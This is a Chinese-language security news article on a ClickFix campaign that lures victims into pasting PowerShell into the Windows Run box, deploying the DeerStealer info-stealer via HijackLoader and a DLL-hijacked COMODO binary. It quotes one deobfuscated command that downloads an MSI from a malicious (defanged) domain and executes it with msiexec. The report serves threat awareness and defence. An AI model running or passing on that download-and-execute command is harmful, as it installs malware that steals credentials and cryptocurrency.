攻击者滥用Windows运行提示框执行恶意命令并部署DeerStealer窃密木马

网络安全研究人员发现一起复杂的恶意软件攻击活动，攻击者利用Windows内置的"运行"提示框传播DeerStealer——这款功能强大的信息窃取程序专门窃取加密货币钱包、浏览器凭证和敏感个人数据。

新型社会工程攻击手法

该恶意活动展现了社会工程策略的演进趋势，攻击者将合法的Windows功能与高级恶意软件部署技术相结合，从而绕过传统安全防护措施。2025年5月持续活跃的该攻击活动采用名为ClickFix的技术，诱骗受害者通过Windows运行对话框自愿执行恶意PowerShell命令。

受害者通常会被重定向至精心设计的钓鱼页面，页面显示虚假错误信息或系统通知，诱使他们按下Windows+R组合键并粘贴看似合法的命令来"解决"虚构的问题。这种方法通过利用用户自身操作和受信任的系统进程，有效规避了众多安全控制措施。

暗网订阅制恶意软件服务

eSentire安全分析师通过其威胁响应部门(TRU)发现攻击者多次尝试部署该恶意软件，揭示了该活动的广泛性和技术实现的复杂性。研究人员发现这款也被称为XFiles的恶意软件正在暗网黑客论坛以订阅制模式出售，卖家"LuciferXfiles"提供的月费方案从200美元到3000美元不等，具体价格取决于功能集和服务内容。

DeerStealer是一个全能型数据窃取平台，能够窃取800多个浏览器扩展凭证，针对14种不同数字货币的钱包，并从Discord、Telegram、Steam及各类VPN客户端等流行应用中收集数据。其功能不仅限于简单的凭证窃取，还包括：

• 加密货币地址替换的剪贴板劫持功能
• 远程桌面控制的隐藏VNC访问
• 样本间相似度仅50%的高级混淆技术

隐蔽的基础设施架构

该恶意软件使用名为"Gasket"的代理域名系统来隐藏真实的命令控制(C2)服务器位置，同时保持持久通信通道。结合其利用硬件标识符和系统时间戳对受害者设备进行指纹识别的能力，显示出攻击者对操作安全性和长期活动可持续性的重视。

高级感染机制与载荷部署

DeerStealer感染链始于受害者粘贴到Windows运行提示框中的混淆PowerShell命令。解码后的命令揭示了一个利用无文件攻击(Living-off-the-land)技术规避检测的多阶段部署过程。初始PowerShell脚本包含以下反混淆内容：

$AqEVu = $env:AppData;functionkWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};functionzPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}$wQmPq = $env:AppData + 'now.msi';zPWQQKzb "hxxps://luckyseaworld[.]com/now.msi";msiexec.exe /i $wQmPq;;

该脚本利用合法的curl.exe实用程序从被入侵或恶意的域名下载名为"now.msi"的Microsoft安装程序包，然后使用Windows Installer服务执行。MSI文件作为HijackLoader的投放器——这款2023年出现的复杂恶意软件加载器采用隐写术将其配置数据隐藏在加密的PNG图像中。

部署后，HijackLoader将多个文件复制到C:ProgramData目录，并执行一个经过DLL劫持技术篡改的、具有合法数字签名的COMODO Internet Security二进制文件。该合法可执行文件加载恶意版本的cmdres.dll，其中包含C运行时的钩子，将执行流重定向到恶意软件的第一阶段，从而利用受信任的二进制文件作为恶意代码执行的载体，同时保持合法系统活动的表象。

原文始发于微信公众号（FreeBuf）：攻击者滥用Windows运行提示框执行恶意命令并部署DeerStealer窃密木马